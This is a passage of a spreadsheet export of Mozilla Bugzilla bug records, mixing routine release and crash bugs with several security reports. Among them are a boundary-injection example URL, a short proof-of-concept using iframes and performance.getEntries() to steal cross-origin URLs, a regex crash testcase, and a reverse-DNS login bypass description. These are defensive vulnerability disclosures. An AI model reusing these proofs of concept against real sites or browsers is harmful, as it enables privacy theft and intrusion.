      <c r="C4587" t="inlineStr">
        <is>
          <t>[SECURITY] Content/Header injection due to non-random multipart/x-mixed-replace boundary</t>
        </is>
      </c>
      <c r="D4587" t="inlineStr">
        <is>
          <t>2010-12-01 10:56:08 -0800</t>
        </is>
      </c>
      <c r="E4587" t="n">
        <v>1</v>
      </c>
      <c r="F4587" t="n">
        <v>1</v>
      </c>
      <c r="G4587" t="n">
        <v>4</v>
      </c>
      <c r="H4587" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4587" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4587" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K4587" t="inlineStr">
        <is>
          <t>2.10</t>
        </is>
      </c>
      <c r="L4587" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4587" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4587" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4587" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4587" t="inlineStr"/>
      <c r="Q4587" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4587" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4587" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T4587" t="n">
        <v>1</v>
      </c>
      <c r="U4587" t="n">
        <v>0</v>
      </c>
      <c r="V4587" t="n">
        <v>34</v>
      </c>
      <c r="W4587" t="inlineStr">
        <is>
          <t>Search result of b.m.o. does not escape "--------- =_aaaaaaaaaa0": it is used as boudary of multipart/x-mixed-replace.
Attackers can inject boundary of multipart/x-mixed-replace.
It may be able to be used for HTTP Header injection.
Example:
https://bugzilla.mozilla.org/buglist.cgi?query_format=advanced&amp;short_desc=---------%20%3D_aaaaaaaaaa0&amp;short_desc_type=allwordssubstr&amp;resolution=---&amp;resolution=DUPLICATE</t>
        </is>
      </c>
      <c r="X4587" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4588">
      <c r="A4588" t="n">
        <v>1789128</v>
      </c>
      <c r="B4588" t="inlineStr">
        <is>
          <t>2022-09-04 05:03:45 -0700</t>
        </is>
      </c>
      <c r="C4588" t="inlineStr">
        <is>
          <t>A Variant of bug id 1487964: Cross-Origin URL Steal is possible using performance.getEntries()</t>
        </is>
      </c>
      <c r="D4588" t="inlineStr">
        <is>
          <t>2024-05-30 11:00:06 -0700</t>
        </is>
      </c>
      <c r="E4588" t="n">
        <v>1</v>
      </c>
      <c r="F4588" t="n">
        <v>1</v>
      </c>
      <c r="G4588" t="n">
        <v>3</v>
      </c>
      <c r="H4588" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4588" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4588" t="inlineStr">
        <is>
          <t>DOM: Performance</t>
        </is>
      </c>
      <c r="K4588" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4588" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4588" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4588" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4588" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4588" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main106+][adv-esr102.4+]</t>
        </is>
      </c>
      <c r="Q4588" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4588" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4588" t="inlineStr">
        <is>
          <t>107 Branch</t>
        </is>
      </c>
      <c r="T4588" t="n">
        <v>1</v>
      </c>
      <c r="U4588" t="n">
        <v>0</v>
      </c>
      <c r="V4588" t="n">
        <v>17</v>
      </c>
      <c r="W4588" t="inlineStr">
        <is>
          <t>We are able to steal Cross-Origin URL when we frame the page. This is a variant of https://bugzilla.mozilla.org/show_bug.cgi?id=1487964
PoC:
framescript.php:
&lt;iframe src="http://pwning.click/ffembed.php"/&gt;&lt;/iframe&gt;
ffembed.php:
&lt;embed src="/ffscript.php"&gt;
&lt;script&gt;
setTimeout(function(){alert(performance.getEntriesByType("resource")[1].name)},3000);
&lt;/script&gt;
ffscript.php:
&lt;script&gt;location="https://www.bing.com/search?q=test"&lt;/script&gt;
Test on: http://pwning.click/framescript.php
I tested on Latest Firefox Nightly for Windows.</t>
        </is>
      </c>
      <c r="X4588" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4589">
      <c r="A4589" t="n">
        <v>1277258</v>
      </c>
      <c r="B4589" t="inlineStr">
        <is>
          <t>2016-06-01 07:59:56 -0700</t>
        </is>
      </c>
      <c r="C4589" t="inlineStr">
        <is>
          <t>Drop the now unused job_log_url table</t>
        </is>
      </c>
      <c r="D4589" t="inlineStr">
        <is>
          <t>2016-06-28 06:10:46 -0700</t>
        </is>
      </c>
      <c r="E4589" t="n">
        <v>1</v>
      </c>
      <c r="F4589" t="n">
        <v>1</v>
      </c>
      <c r="G4589" t="n">
        <v>7</v>
      </c>
      <c r="H4589" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4589" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4589" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K4589" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4589" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4589" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4589" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4589" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4589" t="inlineStr"/>
      <c r="Q4589" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4589" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4589" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4589" t="n">
        <v>1</v>
      </c>
      <c r="U4589" t="n">
        <v>0</v>
      </c>
      <c r="V4589" t="n">
        <v>3</v>
      </c>
      <c r="W4589" t="inlineStr">
        <is>
          <t>At whatever point we're happy bug 1273231 will not need reverting, we can drop the job_log_url tables on {SCL3 prod, SCL3 stage, Heroku RDS x *}.
A good time to do this might be after the heroku stage move, but before prod (since it will reduce data transfer size).</t>
        </is>
      </c>
      <c r="X4589" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4590">
      <c r="A4590" t="n">
        <v>1436305</v>
      </c>
      <c r="B4590" t="inlineStr">
        <is>
          <t>2018-02-07 02:38:26 -0800</t>
        </is>
      </c>
      <c r="C4590" t="inlineStr">
        <is>
          <t>[in-tree scheduling] shipping releases emails are lies</t>
        </is>
      </c>
      <c r="D4590" t="inlineStr">
        <is>
          <t>2018-02-14 07:41:41 -0800</t>
        </is>
      </c>
      <c r="E4590" t="n">
        <v>1</v>
      </c>
      <c r="F4590" t="n">
        <v>1</v>
      </c>
      <c r="G4590" t="n">
        <v>5</v>
      </c>
      <c r="H4590" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4590" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4590" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K4590" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4590" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4590" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4590" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4590" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4590" t="inlineStr">
        <is>
          <t>[releaseduty]</t>
        </is>
      </c>
      <c r="Q4590" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4590" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4590" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4590" t="n">
        <v>1</v>
      </c>
      <c r="U4590" t="n">
        <v>0</v>
      </c>
      <c r="V4590" t="n">
        <v>7</v>
      </c>
      <c r="W4590" t="inlineStr">
        <is>
          <t>Whenever we trigger shipping phase, the emails are triggered as well saying the "release has been shipped". This is a lie since we only schedule them in Balrog, pending RelMan &amp; RelEng approval. 
We need to amend the notifications in such a way that either:
a) they mention when the change is scheduled (most likely ETA from Ship-it passed down to action task and then to in-tree scheduling)
b) at least say the release has `been scheduled to be shipped in Balrog pending signoffs` instead of the current message.</t>
        </is>
      </c>
      <c r="X4590" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4591">
      <c r="A4591" t="n">
        <v>739703</v>
      </c>
      <c r="B4591" t="inlineStr">
        <is>
          <t>2012-03-27 11:09:25 -0700</t>
        </is>
      </c>
      <c r="C4591" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of Thunderbird 11.0.1</t>
        </is>
      </c>
      <c r="D4591" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:56 -0700</t>
        </is>
      </c>
      <c r="E4591" t="n">
        <v>1</v>
      </c>
      <c r="F4591" t="n">
        <v>1</v>
      </c>
      <c r="G4591" t="n">
        <v>5</v>
      </c>
      <c r="H4591" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4591" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4591" t="inlineStr">
        <is>
          <t>Release Requests</t>
        </is>
      </c>
      <c r="K4591" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4591" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4591" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4591" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4591" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4591" t="inlineStr"/>
      <c r="Q4591" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4591" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4591" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4591" t="n">
        <v>1</v>
      </c>
      <c r="U4591" t="n">
        <v>0</v>
      </c>
      <c r="V4591" t="n">
        <v>5</v>
      </c>
      <c r="W4591" t="inlineStr">
        <is>
          <t>Changesets:
    comm-release: http://hg.mozilla.org/releases/comm-release/rev/832c448e5d0a
    mozilla-release: http://hg.mozilla.org/releases/mozilla-release/rev/75b17db9b6e9
        relbranch: COMM110_2012030910_RELBRANCH
    L10n changesets: same as for 11.0 final.</t>
        </is>
      </c>
      <c r="X4591" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4592">
      <c r="A4592" t="n">
        <v>489676</v>
      </c>
      <c r="B4592" t="inlineStr">
        <is>
          <t>2009-04-22 15:20:38 -0700</t>
        </is>
      </c>
      <c r="C4592" t="inlineStr">
        <is>
          <t>fx-win32-1.9-slave07 and fx-win32-1.9-slave08 failing in mochitests for no apparent reason</t>
        </is>
      </c>
      <c r="D4592" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4592" t="n">
        <v>1</v>
      </c>
      <c r="F4592" t="n">
        <v>1</v>
      </c>
      <c r="G4592" t="n">
        <v>5</v>
      </c>
      <c r="H4592" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4592" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4592" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4592" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4592" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4592" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4592" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4592" t="inlineStr">
        <is>
          <t>DUPLICATE</t>
        </is>
      </c>
      <c r="P4592" t="inlineStr"/>
      <c r="Q4592" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4592" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4592" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4592" t="n">
        <v>1</v>
      </c>
      <c r="U4592" t="n">
        <v>0</v>
      </c>
      <c r="V4592" t="n">
        <v>8</v>
      </c>
      <c r="W4592" t="inlineStr">
        <is>
          <t>Both these slaves are timing out. None of the recent checkins should have affected mochitests.</t>
        </is>
      </c>
      <c r="X4592" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4593">
      <c r="A4593" t="n">
        <v>96824</v>
      </c>
      <c r="B4593" t="inlineStr">
        <is>
          <t>2001-08-24 08:23:59 -0700</t>
        </is>
      </c>
      <c r="C4593" t="inlineStr">
        <is>
          <t>Pasting bookmarkfolder on an existing bookmark results in crash</t>
        </is>
      </c>
      <c r="D4593" t="inlineStr">
        <is>
          <t>2004-11-22 17:25:08 -0800</t>
        </is>
      </c>
      <c r="E4593" t="n">
        <v>1</v>
      </c>
      <c r="F4593" t="n">
        <v>1</v>
      </c>
      <c r="G4593" t="n">
        <v>2</v>
      </c>
      <c r="H4593" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4593" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J4593" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K4593" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4593" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4593" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4593" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4593" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4593" t="inlineStr"/>
      <c r="Q4593" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4593" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4593" t="inlineStr">
        <is>
          <t>mozilla0.9.6</t>
        </is>
      </c>
      <c r="T4593" t="n">
        <v>1</v>
      </c>
      <c r="U4593" t="n">
        <v>0</v>
      </c>
      <c r="V4593" t="n">
        <v>11</v>
      </c>
      <c r="W4593" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.3+)
Gecko/20010817
BuildID:    Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.3+)
Gecko/20010817
copy a folder in your bookmark tree
now rightclick a bookmark and choose paste
instant crash.
Reproducible: Always
Steps to Reproduce:
see description
Actual Results:  crash
Expected Results:  paste above or below the given bookmark</t>
        </is>
      </c>
      <c r="X4593" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4594">
      <c r="A4594" t="n">
        <v>1607443</v>
      </c>
      <c r="B4594" t="inlineStr">
        <is>
          <t>2020-01-07 05:42:24 -0800</t>
        </is>
      </c>
      <c r="C4594" t="inlineStr">
        <is>
          <t>In-the-wild 0-day reported by Qihoo 360</t>
        </is>
      </c>
      <c r="D4594" t="inlineStr">
        <is>
          <t>2021-09-23 16:41:17 -0700</t>
        </is>
      </c>
      <c r="E4594" t="n">
        <v>1</v>
      </c>
      <c r="F4594" t="n">
        <v>1</v>
      </c>
      <c r="G4594" t="n">
        <v>3</v>
      </c>
      <c r="H4594" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4594" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4594" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K4594" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4594" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4594" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4594" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4594" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4594" t="inlineStr">
        <is>
          <t>[adv-main72.0.1+][adv-esr68.4.1+][sec-survey]</t>
        </is>
      </c>
      <c r="Q4594" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4594" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4594" t="inlineStr">
        <is>
          <t>mozilla74</t>
        </is>
      </c>
      <c r="T4594" t="n">
        <v>1</v>
      </c>
      <c r="U4594" t="n">
        <v>0</v>
      </c>
      <c r="V4594" t="n">
        <v>32</v>
      </c>
      <c r="W4594" t="inlineStr">
        <is>
          <t>Created attachment 9119085
RAW-EXPLOIT-POC.html
We received an email to security@:
```
This is Ella from Qihoo 360 ATA team. We just caught a wild used 0day, and it's already been exploited in active attacks in the wild. It take advantage of PAC script engine and it is a remote cod execution issue.
 Attached is the POC for your reference. 
```
Decrypted and attached, no analysis yet.</t>
        </is>
      </c>
      <c r="X4594" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4595">
      <c r="A4595" t="n">
        <v>831055</v>
      </c>
      <c r="B4595" t="inlineStr">
        <is>
          <t>2013-01-15 15:44:23 -0800</t>
        </is>
      </c>
      <c r="C4595" t="inlineStr">
        <is>
          <t>"Assertion failure: [infer failure] Missing type in object [0x241d1f0] lastIndex: float,"</t>
        </is>
      </c>
      <c r="D4595" t="inlineStr">
        <is>
          <t>2013-11-25 13:26:59 -0800</t>
        </is>
      </c>
      <c r="E4595" t="n">
        <v>1</v>
      </c>
      <c r="F4595" t="n">
        <v>1</v>
      </c>
      <c r="G4595" t="n">
        <v>3</v>
      </c>
      <c r="H4595" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4595" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4595" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4595" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4595" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4595" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4595" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4595" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4595" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main20+] YARR bug on Win64</t>
        </is>
      </c>
      <c r="Q4595" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4595" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4595" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4595" t="n">
        <v>1</v>
      </c>
      <c r="U4595" t="n">
        <v>0</v>
      </c>
      <c r="V4595" t="n">
        <v>13</v>
      </c>
      <c r="W4595" t="inlineStr">
        <is>
          <t>Created attachment 702566
stack
r = RegExp("(?!})()?", "g");
r.test();
r.lastIndex;
asserts js debug shell on m-c changeset 56ff556e74d9 with -a at Assertion failure: [infer failure] Missing type in object [0x241d1f0] lastIndex: float,
Tested on 64-bit. s-s because this is an inference failure.
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   116119:b7e2ba73b2ff
user:        Sean Stangl
date:        Wed Dec 12 18:11:28 2012 -0800
summary:     Bug 808245, Part 6/6 - Add MatchOnly mode and lazify RegExpStatics.
 r=dvander</t>
        </is>
      </c>
      <c r="X4595" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4596">
      <c r="A4596" t="n">
        <v>1257765</v>
      </c>
      <c r="B4596" t="inlineStr">
        <is>
          <t>2016-03-17 23:25:07 -0700</t>
        </is>
      </c>
      <c r="C4596" t="inlineStr">
        <is>
          <t>[Mac] Obj-C exception: [NSInvalidArgumentException: *** -[_NSConcreteUserNotification setUserInfo:]. UserInfo too big. Encoded data greater than 16k....]</t>
        </is>
      </c>
      <c r="D4596" t="inlineStr">
        <is>
          <t>2016-09-22 17:25:08 -0700</t>
        </is>
      </c>
      <c r="E4596" t="n">
        <v>1</v>
      </c>
      <c r="F4596" t="n">
        <v>1</v>
      </c>
      <c r="G4596" t="n">
        <v>3</v>
      </c>
      <c r="H4596" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4596" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4596" t="inlineStr">
        <is>
          <t>Widget: Cocoa</t>
        </is>
      </c>
      <c r="K4596" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4596" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4596" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4596" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4596" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4596" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q4596" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4596" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4596" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T4596" t="n">
        <v>1</v>
      </c>
      <c r="U4596" t="n">
        <v>0</v>
      </c>
      <c r="V4596" t="n">
        <v>39</v>
      </c>
      <c r="W4596" t="inlineStr">
        <is>
          <t>Created attachment 8732034
testcase (reload me)
1. Load the testcase
2. Reload
2016-03-17 23:13:28.512 firefox[3164:7228384] Mozilla has caught an Obj-C exception [NSInvalidArgumentException: *** -[_NSConcreteUserNotification setUserInfo:]. UserInfo too big. Encoded data greater than 16k. (32835 bytes)]
###!!! ASSERTION: This is unsafe! Fix the caller!: 'Error', file dom/events/EventDispatcher.cpp, line 553</t>
        </is>
      </c>
      <c r="X4596" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4597">
      <c r="A4597" t="n">
        <v>129466</v>
      </c>
      <c r="B4597" t="inlineStr">
        <is>
          <t>2002-03-07 05:02:55 -0800</t>
        </is>
      </c>
      <c r="C4597" t="inlineStr">
        <is>
          <t>logincookies IP check can be bypassed</t>
        </is>
      </c>
      <c r="D4597" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:28 -0800</t>
        </is>
      </c>
      <c r="E4597" t="n">
        <v>1</v>
      </c>
      <c r="F4597" t="n">
        <v>1</v>
      </c>
      <c r="G4597" t="n">
        <v>4</v>
      </c>
      <c r="H4597" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4597" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4597" t="inlineStr">
        <is>
          <t>User Accounts</t>
        </is>
      </c>
      <c r="K4597" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L4597" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4597" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4597" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4597" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4597" t="inlineStr">
        <is>
          <t>applied to 2.14.2</t>
        </is>
      </c>
      <c r="Q4597" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4597" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4597" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T4597" t="n">
        <v>1</v>
      </c>
      <c r="U4597" t="n">
        <v>0</v>
      </c>
      <c r="V4597" t="n">
        <v>36</v>
      </c>
      <c r="W4597" t="inlineStr">
        <is>
          <t>The logincookies table has a hostname field. This is obtained from the webserver
via REMOTE_HOST env variable. The webserver gets this by doing a reverse DNS
lookup. Therefore an attacker which can provide reverse dns for their IP can
bypass the IP address checks by providing the hostname of the user they want to
spoof. 
Hostname lookups are disabled by default in apache, so this won't affect most
people, which is why if you look at your logincookies table you'll see ip
addresses. Its still an attack, though, and should be fixed for 2.16.
I've been looking for an excuse to get bug 20122 in for 2.16, and since fixing
this bug is about 2/3 of the work I'll use this. ;)
An open question which I was thinking about before I realised the security
issues: REMOTE_ADDR can be ipv4 or ipv6. If its ipv4, then the field is set to
varchar(15) NOT NULL (or int4 NOT NULL) and we're done. If its ipv6, the field
has to be larger. (I don't plan on supporting the netmask stuff for ipv6). If we
want to validate that the string given by the server is actually an IP, then we
have to drag in some more modules.
Thoughts?</t>
        </is>
      </c>
      <c r="X4597" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4598">
      <c r="A4598" t="n">
        <v>1348168</v>
      </c>
      <c r="B4598" t="inlineStr">
        <is>
          <t>2017-03-16 17:52:45 -0700</t>
        </is>
      </c>
      <c r="C4598" t="inlineStr">
        <is>
          <t>integer overflow in createImageBitmap() overload accepting ArrayBuffer and ArrayBufferView arguments (pwn2own 2017)</t>
        </is>
      </c>
      <c r="D4598" t="inlineStr">
        <is>
          <t>2018-01-08 18:04:41 -0800</t>
        </is>
      </c>
      <c r="E4598" t="n">
        <v>1</v>
      </c>
      <c r="F4598" t="n">
        <v>1</v>
      </c>
      <c r="G4598" t="n">
        <v>3</v>
      </c>
      <c r="H4598" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4598" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4598" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4598" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4598" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4598" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4598" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4598" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4598" t="inlineStr">
        <is>
          <t>[keep hidden while bug 1348894 is unfixed]</t>
        </is>
      </c>
      <c r="Q4598" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4598" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4598" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T4598" t="n">
        <v>1</v>
      </c>
      <c r="U4598" t="n">
        <v>0</v>
      </c>
      <c r="V4598" t="n">
        <v>62</v>
      </c>
      <c r="W4598" t="inlineStr">
        <is>
          <t>Created attachment 8848313
magic.html
this is the vuln we got from pwn2own.  more later.</t>
        </is>
      </c>
      <c r="X4598" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4599">
      <c r="A4599" t="n">
        <v>39619</v>
      </c>
      <c r="B4599" t="inlineStr">
        <is>
          <t>2000-05-17 11:03:44 -0700</t>
        </is>
      </c>
      <c r="C4599" t="inlineStr">
        <is>
          <t>Can't type in URLbar|Search textfields</t>
        </is>
      </c>
      <c r="D4599" t="inlineStr">
        <is>
          <t>2000-05-24 16:50:03 -0700</t>
        </is>
      </c>
      <c r="E4599" t="n">
        <v>1</v>
      </c>
      <c r="F4599" t="n">
        <v>1</v>
      </c>
      <c r="G4599" t="n">
        <v>3</v>
      </c>
      <c r="H4599" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4599" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4599" t="inlineStr">
        <is>
          <t>XUL</t>
        </is>
      </c>
      <c r="K4599" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4599" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4599" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N4599" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4599" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4599" t="inlineStr"/>
      <c r="Q4599" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4599" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4599" t="inlineStr">
        <is>
          <t>M16</t>
        </is>
      </c>
      <c r="T4599" t="n">
